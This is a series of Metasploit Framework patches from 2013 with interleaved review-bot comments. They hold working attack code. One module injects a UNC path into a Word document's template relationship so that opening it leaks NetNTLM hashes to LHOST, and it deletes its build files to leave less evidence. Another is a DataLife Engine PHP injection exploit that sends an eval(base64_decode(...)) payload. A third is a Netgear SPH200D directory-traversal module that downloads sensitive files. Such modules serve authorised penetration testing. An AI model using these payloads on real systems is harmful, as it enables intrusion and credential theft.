$', + 'References' => + [ + [ 'URL', 'http://jedicorp.com/?p=534' ], + ], + 'Author' => + [ + 'SphaZ <cyberphaz[at]gmail.com>' + ] + )) + + register_options( + [ + OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to','']), + OptString.new('SRCFILE', [false, '.docx file to backdoor. If left empty, creates an emtpy document', '']), + OptString.new('SKLFILENAME', [false,'Document output filename', 'stealnetNTLM.docx']), + OptPath.new('SKLOUTPUTPATH', [false, 'The location where the backdoored empty .docx file will be written','./']), + OptString.new('SKLDOCAUTHOR',[false,'Document author for skeleton document', 'SphaZ']), + ], self.class) + end + + + #here we create an empty .docx file with the UNC path. 
Only done when SRCFILE is empty + def makeNewFile + metadataFileData = "" + metadataFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" + metadataFileData << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " + metadataFileData << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " + metadataFileData << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" + metadataFileData << "<dc:creator>#{datastore['SKLDOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['SKLDOCAUTHOR']}" + metadataFileData << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" + metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" + metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" + + #Lets get the local filepath to figure out where we need to write the metadata file + metadataFileName = File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml' + begin + if File.exists?(metadataFileName) + vprint_status("Deleting metadatafile") + File.delete(metadataFileName) + end + fd = File.open( metadataFileName, 'wb+' ) + fd.puts(metadataFileData) + fd.close + rescue + print_error("Cant write to #{metadataFileName} make sure module and data are intact") + return nil + end + + #now lets write the _rels file that contains the UNC path + refdataFileName = File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels' + begin + fd = File.open( refdataFileName, 'wb+' ) + fd.puts(@relsFileData) + fd.close + rescue + print_error("Cant write to #{refdataFileName} make sure module and data are intact.") + return nil + end + + #and finally, lets creat the .docx file + inputPath = File.dirname(self.file_path) + '/sourcedoc/' + inputPath.sub!(%r[/S],'') + + archive = 
File.join(datastore['SKLOUTPUTPATH'], datastore['SKLFILENAME']) + #if file exists, lets not overwrite + if File.exists?(archive) + print_error("Output file #{archive} already exists! Set a different name for SKLOUTPUTPATH and/or SKLFILENAME.") + return nil + end + + if zipDocx(inputPath, archive, false).nil? + return nil + end + + begin + #delete the created xml files, the less evidence of parameters used the better + File.delete(File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml') + File.delete(File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels') + rescue + print_error("Error deleting local core and settings documents. Generating new file worked though") + end + return 0 + end + + + #this bit checks the settings.xml and looks for the relations file entry we need for our evil masterplan. + #and then inserts the UNC path into the _rels file. + def manipulateFile + ref = "<w:attachedTemplate r:id=\"rId1\"/>" + + if File.exists?(datastore['SRCFILE']) + if File.stat(datastore['SRCFILE']).readable? and File.stat(datastore['SRCFILE']).writable? + vprint_status("We can read and write the file, this is probably a good thing :P") + else + print_error("Not enough rights to modify the file. Aborting.") + return nil + end + + fileContent = getFileFromDocx("word/settings.xml") + if fileContent.nil? + return nil + end + + if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? + vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") + #and we put just our rels file into the docx + if unzipDocx.nil? + return nil + end + if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? + return nil + end + #ok we got through this, lets zip the file, overwriting the original in this case + begin + File.delete(datastore['SRCFILE']) + if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? 
+ return nil + end + rescue + print_error("Can't modify the original document :(") + return nil + end + else + #now insert the reference to the file that will enable our malicious entry + insertOne = fileContent.index("<w:defaultTabStop") + + if insertOne.nil? + insertTwo = fileContent.index("<w:hyphenationZone") # 2nd choice + if not insertTwo.nil? + vprint_status("HypenationZone found, we use this for insertion.") + fileContent.insert(insertTwo, ref ) + end + else + vprint_status("DefaultTabStop found, we use this for insertion.") + fileContent.insert(insertOne, ref ) + end + + if insertOne.nil? && insertTwo.nil? + vprint_error("Cannot find insert point for reference into settings.xml") + return nil + end + + if unzipDocx.nil? + return nil + end + #update the settings files + if updateDocxFile("word/settings.xml",fileContent).nil? + print_error("Error inserting data into word/settings.xml") + return nil + end + if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? + print_error("Eror inserting data into word/_rels/settings.xml.rels") + return nil + end + #ok we got through this, lets zip the file, overwriting the original in this case + begin + File.delete(datastore['SRCFILE']) + if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? + return nil + end + rescue + print_error("Can't modify the original document :(") + return nil + end + + end + else + print_error("File #{datastore['SRCFILE']} does not exist. 
Aborting.") + return nil + end + + return 0 + end + + #read a file from .docx into a string + def getFileFromDocx(fileString) + begin + Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| + fileZip.each do |f| + next unless f.to_s == fileString + return f.get_input_stream.read + end + end + fileZip.close + print_error("Cant find #{fileString} inside the .docx") + return nil + rescue + print_error("Unknown error reading docx file.") + fileZip.close + return nil + end + fileZip.close + end + + def zipDocx(inputPath, archive, delsource) + begin + #add the prepared files to the zip file + Zip::ZipFile.open(archive, 'wb') do |fileZip| + Dir["#{inputPath}/**/**"].reject{|f|f==archive}.each do |file| + fileZip.add(file.sub(inputPath+'/',''), file) + end + relsFile = inputPath + '/_rels/.rels' + fileZip.add(relsFile.sub(inputPath+'/',''), relsFile) + end + rescue + print_error("Error zipping file..") + begin + FileUtils.rm_rf(inputPath) + rescue + print_error("Cant even clean up my own mess, I give up") + return nil + end + return nil + end + #do we delete the source? + if delsource + begin + FileUtils.rm_rf(inputPath) + rescue + print_error("Cant even clean up my own mess, I give up") + end + end + return 0 + end + + def unzipDocx + begin + vprint_status("tmpdir: #{@tmpDir}") + if not File.directory?(@tmpDir) + vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. Extracting #{datastore['SRCFILE']}") + Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| + fileZip.each do |entry| + if not entry.nil? 
+ vprint_status("extracting entry: #{entry.name}") + end + fpath = File.join(@tmpDir, entry.name) + FileUtils.mkdir_p(File.dirname(fpath)) + fileZip.extract(entry, fpath) + end + end + end + rescue + print_error("There was an error unzipping") + return nil + end + return 0 + end + + #used for updating the files inside the docx from a string + def updateDocxFile(fileString, content) + begin + #ok so now we unpacked the docx file, lets start to update the file we need to do + #does the file already exist? + archive = File.join(@tmpDir, fileString) + vprint_status("We need to look for: #{archive}") + if File.exists?(archive) + vprint_status("Deleting original file #{archive}") + File.delete(archive) + end + #now lets put OUR file there + File.open(archive, 'wb+') { |f| f.write(content) } + rescue Exception => ex + print_error("Well, extracting and manipulating the file went wrong :(") + return nil + end + return 0 + end + + def run + #we need this in in bot makeNewFile and manipulateFile + @relsFileData = "" + @relsFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp + @relsFileData << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp + @relsFileData << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp + @relsFileData << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" + #where do we unpack our file? + @tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" + + if "#{datastore['SRCFILE']}" == "" + #make an empty file + print_status("Creating empty document") + if not makeNewFile.nil? + print_good("Success! Document #{datastore['SKLFILENAME']} created in #{datastore['SKLOUTPUTPATH']}") + end + else + #extract the word/settings.xml and edit in the reference we need + print_status("Injecting UNC path into existing document.") + if not manipulateFile.nil? 
+ print_good("Success! Document #{datastore['SRCFILE']} now references to #{datastore['LHOST']}") + else + print_error("Something went wrong!") + end + end + end +end From bf7bb9952e5ef3c41cbfdbc6dbe8de1b3301c04b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 11:53:42 +0100 Subject: [PATCH 218/421] added template stuff improve --- .../unix/webapp/datalife_preview_exec.rb | 34 ++++++++++--------- 1 file changed, 18 insertions(+), 16 deletions(-) diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index e1339f1313cb..7497dd6f9bfa 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -18,8 +18,10 @@ def initialize(info = {}) 'Description' => %q{ This module exploits a PHP code injection vulnerability DataLife Engine 9.7. The vulnerability exists in preview.php, due to an insecure usage of preg_replace() - with the e modifier, which allows to inject arbitrary php code, when the template - in use contains a [catlist] or [not-catlist] tag. + with the e modifier, which allows to inject arbitrary php code, when there is a + template installed which contains a [catlist] or [not-catlist] tag, even when the + template isn't in use currently. The template can be configured with the TEMPLATE + datastore option. }, 'Author' => [ @@ -49,7 +51,8 @@ def initialize(info = {}) register_options( [ - OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) + OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]), + OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"]) ], self.class) end 
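Review bot: `unzipDocx` writes every archive entry to `File.join(@tmpDir, entry.name)` without checking that the expanded path stays under `@tmpDir`, so a SRCFILE whose entry names contain `../` would be extracted outside the working directory. The loop should skip any entry whose `File.expand_path(fpath)` does not start with the expanded `@tmpDir`. `@tmpDir` is also built in `run` from `Time.now.to_i` and `rand(1000)` under the shared temp directory, which is guessable and not created atomically; `Dir.mktmpdir` gives a private directory instead. In `getFileFromDocx`, `fileZip` exists only inside the `Zip::ZipFile.open` block, so the three `fileZip.close` calls outside it raise NameError (the one in the `rescue` escapes uncaught) and can be dropped, since the block form closes the archive. `manipulateFile` also deletes SRCFILE before `zipDocx` has succeeded, so a failed re-zip loses the original; writing the new archive first and then replacing the file avoids that.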
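Review bot: The help text of the new `TEMPLATE` option in the `@@ -49,7 +51,8 @@` hunk misspells the tag as `not-catlit`; it should read `not-catlist`, matching the module description changed in the previous hunk. The description could also state that the value must be the name of a template installed on the target, e.g. `"Installed template containing a catlist or not-catlist tag"`. `initialize` starts and ends outside this hunk.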
@@ -57,17 +60,24 @@ def uri normalize_uri(target_uri.path, 'engine', 'preview.php') end - def check - fingerprint = rand_text_alpha(4+rand(4)) + def send_injection(inj) res = send_request_cgi( { 'uri' => uri, 'method' => 'POST', 'vars_post' => { - 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//" - } + 'catlist[0]' => inj + }, + 'cookie' => "dle_skin=#{datastore['TEMPLATE']}" }) + res + end + + def check + fingerprint = rand_text_alpha(4+rand(4)) + + res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//") if res and res.code == 200 and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable @@ -80,14 +90,6 @@ def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") - res = send_request_cgi( - { - 'uri' => uri, - 'method' => 'POST', - 'vars_post' => - { - 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//" - } - }) + res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") end end From 0e22ee73b557197011c931061ee44240c1c1a6a1 Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Fri, 1 Feb 2013 19:26:34 +0100 Subject: [PATCH 219/421] updates ... --- .../admin/http/netgear_sph200d_traversal.rb | 126 +++++++++--------- 1 file changed, 63 insertions(+), 63 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index dde540899607..d9a0a23fd809 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
@@ -1,7 +1,3 @@ -## -# $Id: tomcat_utf8_traversal.rb 14975 2012-03-18 01:39:05Z rapid7 $ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -14,13 +10,11 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::WmapScanServer include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Netgear SPH200D - Directory Traversal Vulnerability', - 'Version' => '$$', 'Description' => %q{ This module exploits a directory traversal vulnerablity which is present in Netgear SPH200D Skype telephone 
@@ -35,45 +29,58 @@ def initialize 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE ) - register_options( [ Opt::RPORT(80), - OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), - ], self.class) end def extract_words(wordfile) - return [] unless wordfile && File.readable?(wordfile) - begin - words = File.open(wordfile, "rb") do |f| - f.read - end - rescue - return [] - end - save_array = words.split(/\r?\n/) - return save_array + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array end - def find_files(files,user,pass) + #traversal every file + def find_files(file,user,pass) traversal = '/../..' - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => traversal << files, - 'basic_auth' => "#{user}:#{pass}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => traversal << file, + 'basic_auth' => "#{user}:#{pass}" + }) + + if (res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/) + print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}! Response: \r\n #{res.body}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => traversal << file, + :pname => traversal, + :risk => 3, + :proof => traversal, + :name => self.fullname, + :category => "web", + :method => "GET" }) - if (res and res.code == 200) - print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! 
Response: \r\n") - print_status("#{res.body}") + + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + print_good("File #{file} downloaded to: #{loot}") elsif (res and res.code) - vprint_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}") + vprint_error("Attempt returned HTTP error #{res.code} and Body #{res.body} on #{rhost}:#{rport}:file->#{file}") end end 
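Review bot: In `find_files`, `traversal << file` appends in place, so after the request is built `traversal` already contains the file name, and the second `traversal << file` under `:path` appends it again. The `:path`, `:pname` and `:proof` values passed to `report_web_vuln` therefore record a doubled path instead of the one that was actually requested, which makes the stored finding misleading. Build the string once, `path = traversal + file`, and use `path` for both `'uri'` and `:path`, leaving `traversal` unchanged for `:pname`.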
@@ -85,50 +92,43 @@ def run_host(ip) pass = datastore['PASSWORD'] end - print_status("Trying to login with #{user} / #{pass}") - - begin - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - end + print_status("Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) - return :abort if (res.code == 404) + return :abort if (res.code == 404) - if [200, 301, 302].include?(res.code) - print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") - else - print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") - return :abort - end + if [200, 301, 302].include?(res.code) + vprint_good("Successful login: #{user} : #{pass} on #{rhost}:#{rport}") + else + vprint_error("No successful login possible. #{user} : #{pass} on #{rhost}:#{rport}") + return :abort + end - rescue ::Rex::ConnectionError - vprint_error("Failed to connect to the web server") - return :abort - end + rescue ::Rex::ConnectionError + vprint_error("Failed to connect to the web server") + return :abort + end begin - print_status("Attempting to connect to #{rhost}:#{rport}") - res = send_request_raw( - { + vprint_status("Attempting to connect to #{rhost}:#{rport}") + res = send_request_cgi({ + 'uri' => '/', 'method' => 'GET', - 'uri' => '/', 'basic_auth' => "#{user}:#{pass}" - }) - + }) if (res) - extract_words(datastore['SENSITIVE_FILES']).each do |files| - find_files(files,user,pass) unless files.empty? + extract_words(datastore['FILELIST']).each do |file| + find_files(file,user,pass) unless file.empty? end end - - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + end end end From fdd5fe77c12917b3264f95f44d8f451af90fd95c Mon Sep 17 00:00:00 2001 
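Review bot: The login probe in `run_host` dereferences `res.code` with no nil guard, so if `send_request_cgi` yields no response (presumably on a timeout) the line `return :abort if (res.code == 404)` raises NoMethodError, which `rescue ::Rex::ConnectionError` does not catch. The later hunk `@@ -99,6 +102,7 @@` adds `return :abort if res.nil?` but places it after the `res.code` line, so it does not help there either. The nil test has to come first: `return :abort if res.nil? or res.code == 404`. This hunk also leaves the final `begin` with no `rescue` clause, so that `begin`/`end` pair can be removed. `run_host` starts above the hunk.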
From: m-1-k-3 <michael.messner@integralis.com> Date: Fri, 1 Feb 2013 19:59:19 +0100 Subject: [PATCH 220/421] more updates ... --- .../admin/http/netgear_sph200d_traversal.rb | 21 +++---------------- 1 file changed, 3 insertions(+), 18 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index d9a0a23fd809..693bc5cf1343 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -86,11 +86,7 @@ def find_files(file,user,pass) def run_host(ip) user = datastore['USERNAME'] - if datastore['PASSWORD'].nil? - pass = "" - else - pass = datastore['PASSWORD'] - end + pass = datastore['PASSWORD'] print_status("Trying to login with #{user} / #{pass}") @@ -116,19 +112,8 @@ def run_host(ip) return :abort end - begin - vprint_status("Attempting to connect to #{rhost}:#{rport}") - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) - if (res) - extract_words(datastore['FILELIST']).each do |file| - find_files(file,user,pass) unless file.empty? - end - end - + extract_words(datastore['FILELIST']).each do |file| + find_files(file,user,pass) unless file.empty? end end end From 988761a6dea9018955f65fec9652ba47126ebf2e Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Fri, 1 Feb 2013 20:18:53 +0100 Subject: [PATCH 221/421] more updates, BID, Exploit-DB --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 693bc5cf1343..1bf1be8c3314 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
@@ -25,6 +25,8 @@ def initialize [ [ 'URL', 'http://support.netgear.com/product/SPH200D' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ], + [ 'BID', '57660' ], + [ 'EDB', '24441' ], ], 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE @@ -63,7 +65,8 @@ def find_files(file,user,pass) }) if (res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/) - print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}! Response: \r\n #{res.body}") + print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}!") + vprint_status("Response: \r\n #{res.body}") report_web_vuln({ :host => rhost, :port => rport, @@ -99,6 +102,7 @@ def run_host(ip) }) return :abort if (res.code == 404) + return :abort if res.nil? if [200, 301, 302].include?(res.code) vprint_good("Successful login: #{user} : #{pass} on #{rhost}:#{rport}") From 7b6d1f4fdde26fe8dfd7ca3e7da3ee42c1379c38 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 1 Feb 2013 13:36:15 -0600 Subject: [PATCH 222/421] Actually test alternate rubies. --- tools/msftidy.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index aa63bea6a476..d8ee2651113f 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -226,9 +226,7 @@ def test_old_rubies(f_rel) puts "Checking syntax for #{f_rel}." rubies ||= RVM.list_strings res = %x{rvm all do ruby -c #{f_rel}}.split("\n").select {|msg| msg =~ /Syntax OK/} - rubies.size == res.size - - error("Fails alternate Ruby version check") if rubies.size + error("Fails alternate Ruby version check") if rubies.size != res.size end def check_ranking From 152f397a1f8a2df61fdf07713159aa77f5138f88 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 20:38:11 +0100 Subject: [PATCH 223/421] first module cleanup --- .../admin/http/netgear_sph200d_traversal.rb | 81 +++++++++---------- 1 file changed, 39 insertions(+), 42 deletions(-) 
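Review bot: In the `tools/msftidy.rb` hunk, `f_rel` is interpolated unescaped into the shell command `%x{rvm all do ruby -c #{f_rel}}`, so a path containing spaces or shell metacharacters is interpreted by the shell instead of being passed as a single argument. msftidy is run against contributed files, so the name should be escaped: `res = %x{rvm all do ruby -c #{Shellwords.escape(f_rel)}}.split("\n").select {|msg| msg =~ /Syntax OK/}`, with `require 'shellwords'` at the top of the file. `rubies ||= RVM.list_strings` assigns a fresh local on every call, so the `||=` caches nothing and a plain `=` would say what it does. `test_old_rubies` begins above the hunk.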
diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 1bf1be8c3314..fdf30c879eb4 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -14,19 +14,17 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Netgear SPH200D - Directory Traversal Vulnerability', + 'Name' => 'Netgear SPH200D Directory Traversal Vulnerability', 'Description' => %q{ - This module exploits a directory traversal vulnerablity which is present - in Netgear SPH200D Skype telephone - You may wish to change SENSITIVE_FILES (hosts sensitive files), RPORT depending - on your environment. - }, + This module exploits a directory traversal vulnerablity which is present in + Netgear SPH200D Skype telephone. + }, 'References' => [ - [ 'URL', 'http://support.netgear.com/product/SPH200D' ], - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ], [ 'BID', '57660' ], [ 'EDB', '24441' ], + [ 'URL', 'http://support.netgear.com/product/SPH200D' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ] ], 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE 
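Review bot: The rewritten `'Description'` still spells `vulnerablity`; it should be `vulnerability`, since this string is shown to users in the module info. `initialize` continues past the end of this hunk.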
@@ -37,53 +35,52 @@ def initialize OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']) ], self.class) end def extract_words(wordfile) - return [] unless wordfile && File.readable?(wordfile) - begin - words = File.open(wordfile, "rb") do |f| - f.read - end - rescue - return [] + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read end - save_array = words.split(/\r?\n/) - return save_array + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array end #traversal every file def find_files(file,user,pass) - traversal = '/../..' + traversal = '/../../' res = send_request_cgi({ - 'method' => 'GET', - 'uri' => traversal << file, + 'method' => 'GET', + 'uri' => normalize_uri(traversal, file), 'basic_auth' => "#{user}:#{pass}" - }) + }) - if (res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/) - print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}!") - vprint_status("Response: \r\n #{res.body}") + if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, :port => rport, :vhost => datastore['VHOST'], - :path => traversal << file, - :pname => traversal, + :path => "/", + :pname => normalize_uri(traversal, file), :risk => 3, - :proof => traversal, + :proof => normalize_uri(traversal, file), :name => self.fullname, :category => "web", :method => "GET" - }) + }) - loot = store_loot("lfi.data","text/plain",rhost, res.body,file) - print_good("File #{file} downloaded to: #{loot}") - elsif (res and res.code) - 
vprint_error("Attempt returned HTTP error #{res.code} and Body #{res.body} on #{rhost}:#{rport}:file->#{file}") + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif res and res.code + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") end end @@ -96,24 +93,24 @@ def run_host(ip) #test login begin res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) + 'uri' => '/', + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) - return :abort if (res.code == 404) return :abort if res.nil? + return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) - vprint_good("Successful login: #{user} : #{pass} on #{rhost}:#{rport}") + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else - vprint_error("No successful login possible. #{user} : #{pass} on #{rhost}:#{rport}") + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") return :abort end rescue ::Rex::ConnectionError - vprint_error("Failed to connect to the web server") - return :abort + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return :abort end extract_words(datastore['FILELIST']).each do |file| From 996ee06b0fc79aa621f953058f2048d9aea02f72 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 20:43:54 +0100 Subject: [PATCH 224/421] fix another print_ call --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index fdf30c879eb4..478a0c39da78 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
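Review bot: The bare `rescue` in extract_words, re-indented by this hunk but otherwise kept, turns any read failure into an empty list, so the module finishes without telling the user that FILELIST could not be read. Narrow it and report the cause, for example `rescue ::SystemCallError => e` followed by `print_error("Unable to read #{wordfile}: #{e.message}")` before `return []`. In find_files, `normalize_uri(traversal, file)` is now evaluated three times; assigning it once (`uri = normalize_uri(traversal, file)`) keeps the request path and the values stored in `:pname` and `:proof` from drifting apart.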
@@ -88,7 +88,7 @@ def run_host(ip) user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("Trying to login with #{user} / #{pass}") + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") #test login begin From c24c926ffaa1da011df5e38dd36e3ad48d8b7e59 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 20:55:06 +0100 Subject: [PATCH 225/421] add aditional check to detect valid device --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 478a0c39da78..311bb838967b 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -99,6 +99,7 @@ def run_host(ip) }) return :abort if res.nil? + return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /simple httpd/) return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) From 4e6c93ec7da76593a356eb859dea31eed96b2924 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Fri, 1 Feb 2013 14:38:20 -0600 Subject: [PATCH 226/421] Various style fixes, fix ruby 1.8 compat --- .../auxiliary/scanner/rdp/ms12-020_check.rb | 224 ++++++++---------- 1 file changed, 102 insertions(+), 122 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index 93dc4bc58ab8..5a16d3685162 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -33,7 +33,7 @@ def initialize(info = {}) 'Royce Davis @R3dy_ <rdavis[at]accuvant.com>', 'Brandon McCann @zeknox 